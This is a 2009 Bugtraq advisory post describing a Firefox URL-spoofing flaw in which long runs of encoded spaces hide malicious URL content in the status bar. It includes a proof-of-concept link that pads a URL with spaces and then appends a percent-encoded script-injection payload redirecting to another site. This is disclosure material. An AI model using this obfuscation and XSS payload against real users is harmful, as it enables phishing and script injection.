Bugtraq mailing list archives
FIREFOX URL space character SPOOF
From: xushaopei <xisigr () gmail com>
Date: Sun, 31 May 2009 09:14:43 +0800
Vulnerability: ============== Firefox browser address bar in dealing with the URL, the URL and the status bar when the space character, there is no reasonable encoding of the URL. Blank characters behind the malicious code will be hidden. An attacker can construct a space with a long URL to the URL to deceive. Exploit: ============== if other site there is a XSS vulnerability, such as: <a href='http://127.0.0.1/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%67%2E%63%6E%27%3C%2F%73%63%72%69%70%74%3E'>test</a> "http://127.0.0.1" which there is a XSS. When you put the code above, save it as a HMTL file, and then run. You can see the Firefox status bar, malicious code has been hidden, because of space.While convenient for users to view, but space is shielding the user's eyes. I think the Firefox status bar in dealing with the space and the address bar, it should be URL encoded. At the same time, the focus on convenience, but also to focus on safety. =============== xisigr[topsec] xisigr () gmail com
Current thread:
- FIREFOX URL space character SPOOF xushaopei (Jun 01)